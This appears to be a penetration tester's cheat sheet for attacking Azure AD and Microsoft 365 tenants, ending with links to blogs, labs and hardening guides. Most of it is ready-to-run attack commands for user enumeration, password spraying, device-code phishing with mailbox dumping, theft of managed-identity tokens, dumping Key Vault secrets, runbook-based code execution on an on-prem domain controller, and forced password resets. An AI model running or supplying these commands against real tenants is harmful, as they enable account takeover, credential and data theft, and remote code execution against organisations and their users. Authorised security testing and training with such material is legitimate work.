Azure AD Assessment
Automated
pip install az-cli
az login
# from https://portal.azure.com/ make sure the default directory is the directory you are testing
python3 scount.py --cli
prowler azure --browser-auth
Manual Recon
Enumerate the tenant id
Recon
# Get all the information
Import-Module .\AADInternals\AADInternals.psd1
$DomainName = "example.onmicrosoft.com"
Invoke-AADIntReconAsOutsider -DomainName $DomainName
# Enumerate Subdomains
Import-Module .\MicroBurst.psm1
# Enumerate all subdomains for an organization specified using the '-Base' parameter
Invoke-EnumerateAzureSubDomains -Base example -Verbose
# Validate if account exists
Invoke-AADIntUserEnumerationAsOutsider -username paul@example.onmicrosoft.com
# Enumerate valid Usernames
cat C:\tools\usernames.txt | Invoke-AADIntUserEnumerationAsOutsider
# Spray Accounts
# Usernames.txt should contain accounts with the fqdn e.g., [email protected]
Invoke-MSOLSpray -UserList .\usernames.txt -Password Winter2022
Device Code phising
Import-Module .\TokenTactics-main\TokenTactics.psd1
# Generate the device code and user code
Get-AzureToken -Client MSGraph
# Dump Outlook using the access token
Dump-OWAMailboxViaMSGraphApi -AccessToken $response.access_token -mailFolder
Abusing Managed Identities
# Extract the MSI_SECRET and MSI_ENDPOINT values from env. variables
env | grep MSI
# Query the Identitiy endpoint for GraphAPI, AzureVault and Management access tokens
curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
$mgmtToken = 'eyJ0eXAiOiJKV1QiLX9rsVtX99Rk...[SNIP]...BQXTOxQ8GYK8QvIV7ZuwGjlyc9iL7Q'
$graph = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJ...[SNIP]...H8PmkZf3tTKd57dg'
$keyVault = 'eyJ0eXAiOiJdiUm9LSTNR...[SNIP]...S-KsIKUadEC784ShMsWcirZCw'
Disconnect-AzAccount
Connect-AzAccount -KeyVaultAccessToken $keyVault -AccessToken $mgmtToken -GraphAccessToken $graph -AccountId e1703509-9d01-4f6d-b883-82783ab59446
Enumerate Resources
Manual
- Enumerate sharepoint by using the link
https://<tenant>.sharepoint.com/_forms/default.aspx
- Enumerate OneDrive by using the link:
https://<tenant>-my.sharepoint.com
Powershell AZ Module
$password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('[email protected]', $Password) Connect-AzAccount -Credential $creds
Connect-AzAccount -Credential $creds
# Enumerate resources our user has access to
Get-AzResource
# Confirm account is service principal
Get-AzContext
Get-AzADuser
Get-AzADGroup
Get-AzADGroupMember -ObjectId 01086658-6706-44e8-a373-96ab550c72f7
# Enumerate a specific user
Get-AzADUser -UserPrincipalName HelpDeskAdmin@example.onmicrosoft.com
# Enum directory roles
Get-AzureADDirectoryRole
# Identify users with global admin
Get-AzureADDirectoryRole -ObjectId b5da7126-cb27-48e6-a316-e319ba453b65 | Get-AzureADDirectoryRoleMember
# Identify users with the helpdeskadmin role
Get-AzureADDirectoryRole -ObjectId 65b73b34-3665-424f-8c89-d17857e1cd9f | Get-AzureADDirectoryRoleMember
# Check our permission for the storage account
Get-AzRoleAssignment -scope /subscriptions/41f08921-2fda-417e-9c1f-898ffec3347a/resourceGroups/Storage-RG/providers/Microsoft.Storage/storageAccounts/examplestorage
AZ Cli
# --allow-no-subscriptions flag is needed for teanent that don't have any subscriptions
az login -u "[email protected]" -p "P@ssw0rd" --allow-no-subscriptions
# Login as a service principal account
az login --service-principal -u b17d33ed-2f12-4dd7-a902-a0a5d11eda1c -p P@ssw0rd --tenant d420c085-2058-4f82-9f80-1316b0034eee
# Check for the existence of the C:\Users\username\.azure folder to validate if an account is logged
# Show logged in account
az account show
# Enumerate Users
az ad user list
# Find resources our user has access to
az resource list
# Check our roles
az role assignment list --all
# Generate access token for management and vault services
az account get-access-token --resource https://management.azure.com
az account get-access-token --resource https://vault.azure.net
# Describe custom roles
az role definition list --custom-role-only
Azure Hound
.\azurehound-windows-amd64\azurehound.exe list -u "[email protected]" -p 'P@ssw0rd' -t 'example.onmicrosoft.com' -o azure_hound.json
As of now, azure blood hound is not very stable; Enable debug mode in Blood hound to view the raw queries, for better debugging.
Enumerate SharePoint
# Enumerate Root folder
$accessToken = 'eyJ0eXAiOiJKV1Qi...[SNIP]...1bpJg3QtPS8MO2'
$URi = 'https://graph.microsoft.com/v1.0/me/drive/root/children'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{ 'Authorization' = "Bearer $accessToken" } }
(Invoke-RestMethod @RequestParams).value
# Enumerate a the MyPat sub-folder
$URi = 'https://graph.microsoft.com/v1.0/me/drive/root:/MyPAT:/children'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{ 'Authorization' = "Bearer $accessToken" } }
(Invoke-RestMethod @RequestParams).value
Dump Secerets Vault
Get-AzKeyVault | fl *
Get-AzKeyVaultSecret -VaultName Paul-webapp-KeyVault
Get-AzKeyVaultSecret -VaultName Paul-webapp-KeyVault -Name paul-localkeys -AsPlainText | fl *
Gaining RCE from RunBooks
Import-AzAutomationRunbook -Name Wowieee -Path C:\tools\shell.ps1 -AutomationAccountName terminal-srv-runbook -ResourceGroupName Runbook-RG -Type PowerShell -Force -Verbose
Publish-AzAutomationRunbook -RunbookName Wowieee -AutomationAccountName terminal-srv-runbook -ResourceGroupName Runbook-RG -Verbose
Start-AzAutomationRunbook -RunbookName Wowieee -RunOn OnpremInternalDC -AutomationAccountName terminal-srv-runbook -ResourceGroupName Runbook-RG -Verbose
Use Powershell AZ to reset a user password
$password = "MyStr0ngPassw0rd1" | ConvertTo-SecureString -AsPlainText -Force
(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq
"[email protected]"}).ObjectId |
Set-AzureADUserPassword -Password $Password -Verbose
Abusing illicit consent grant
Validate the issue exists
Cloud Misconfiguration & Risks - Azure
Exploitation
Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack (alteredsecurity.com) GitHub - AlteredSecurity/365-Stealer: 365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack.
Dump MSOL Password
Dump Storage account Data
Files wont show using az cli tool or powershell az module because it has because that the role assigned to storageviewer user is βReader and Data Access
Azure Storage Explorer β cloud storage management | Microsoft Azure
Syncing Azure AD and On-Prem AD
PTA
Azure Active Directory (Azure AD) Pass-through Authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature validates users' passwords directly against your on-premises Active Directory.
PHS
Password hash synchronization is one of the sign-in methods used to accomplish hybrid identity. Azure AD Connect synchronizes a hash of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
Fundamentals
Pentester Academy - Attacking and Defending Azure AD Cloud: Beginner's Edition
Cheatsheets
Blog Posts
Managed Identity Attack Paths, Part 1: Automation Accounts | by Andy Robbins | Posts By SpecterOps Team Members Managed Identity Attack Paths, Part 2: Logic Apps | by Andy Robbins | Posts By SpecterOps Team Members Managed Identity Attack Paths, Part 3: Function Apps | by Andy Robbins | Posts By SpecterOps Team Members Introducing a new phishing technique for compromising Office 365 accounts | Device Code Phising - AADInternals Cloud Misconfiguration & Risks - Azure Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack (alteredsecurity.com) Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials (aadinternals.com)
Labs
CloudBreach.io - Breaching Azure
Videos
Azure Security best practices | Azure Tips and Tricks - YouTube Assume Breach: An Inside Look at Cloud Service Provider Security - YouTube from 25:00 -> 27:00
Hardening
What is Conditional Access in Azure Active Directory? - Microsoft Entra | Microsoft Learn Just-in-time virtual machine access in Microsoft Defender for Cloud | Microsoft Learn